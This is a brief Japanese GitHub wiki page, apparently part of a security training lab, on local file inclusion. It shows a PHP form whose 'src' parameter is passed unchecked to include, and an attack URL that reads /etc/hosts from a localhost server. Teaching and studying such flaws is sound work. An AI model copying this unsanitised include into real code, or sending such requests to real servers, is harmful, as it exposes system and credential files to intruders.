ローカルファイルインクルード 01 - yujitounai/helloworld GitHub Wiki

ローカルファイルインクルード/Local File Inclusion

単純なローカルファイルインクルード

脆弱なソースコード (php)

<div class="box">
	<form method="get" action="">src
		<input name="src" type="text">
		<input type="submit">
	</form>
</div>
<?php
$src = filter_input(INPUT_GET,"src");
if($src)include $src;
?>

攻撃する方法

http://localhost:9001/lfi-01.php?src=/etc/hosts

⚠️ **GitHub.com Fallback** ⚠️